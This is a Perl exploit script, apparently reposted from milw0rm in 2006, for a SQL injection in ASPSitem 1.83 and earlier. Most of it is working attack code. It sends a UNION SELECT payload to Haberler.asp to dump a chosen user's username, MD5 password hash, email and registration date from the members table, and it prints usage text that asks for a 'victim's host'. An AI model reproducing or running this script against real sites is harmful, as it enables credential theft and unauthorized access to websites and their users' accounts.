ASPSitem <= 1.83 (Haberler.asp) Remote SQL Injection Exploit :

Date : 2006-04-19 Author : nukedx
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=23
#Usage: aspsi.pl <host> <path> <userid>
use IO::Socket;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
  print "
- NukedX Security Advisory Nr.2006-23
";
  print "- ASPSitem <= 1.83 Remote SQL Injection Exploit
";
}
sub usage() 
{
  header();
  print "- Usage: $0 <host> <path>
";
  print "- <host> -> Victim's host ex: www.victim.com
";
  print "- <path> -> Path to ASPSitem ex: /aspsitem/
";
  print "- <userid> -> ID of user that you want info ex: 1
";
  exit();
}
sub exploit () 
{
  #Our variables...
  $asserver = $ARGV[0];
  $asserver =~ s/(http://)//eg;
  $ashost   = "http://".$asserver;
  $asdir    = $ARGV[1];
  $asport   = "80";
  $astar    = "Haberler.asp?haber=devam&id=";
  $asxp     = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2];
  $asreq    = $ashost.$asdir.$astar.$asxp;
  #Sending data...
  header();
  print "- Trying to connect: $asserver
";
  $as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...
";
  print $as "GET $asreq HTTP/1.1
";
  print $as "Accept: */*
";
  print $as "Referer: $ashost
";
  print $as "Accept-Language: tr
";
  print $as "User-Agent: NukeZilla
";
  print $as "Cache-Control: no-cache
";
  print $as "Host: $asserver
";
  print $as "Connection: close

";
  print "- Connected...
";
  while ($answer = <$as>) {
    if ($answer =~ /class="tablo_baslik"><b> (.*?)</b></td>/) {
      if ($1 == $ARGV[2]) {
        print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials
";
      }
      else { die "- Exploit failed
"; }     
    }
    if ($answer =~ /" align="left">(.*?)</) {
      print "- Username: $1
";
    }
    if ($answer =~ /Ekleyen&nbsp;&nbsp;(<b>(.*?)</b>)/) {
      print "- MD5 HASH of PASSWORD: $1
";
    }
    if ($answer =~ /| (.*?) ]<br>/) {
      print "- Regdate: $1
";
    }
    if ($answer =~ /haber=yorum&id=(.*?)">Yorumlar/) {
      print "- Email: $1
";
    }
    if ($answer =~ / Okunma : (.*?) /) {
      print "- MD5 hash of answer: $1
";
      exit();
    }
  }
  #Exploit failed...
  print "- Exploit failed
"
}

#nukedx.com [2006-04-19]

# milw0rm.com [2006-04-19]

C1

 

C2

 

C3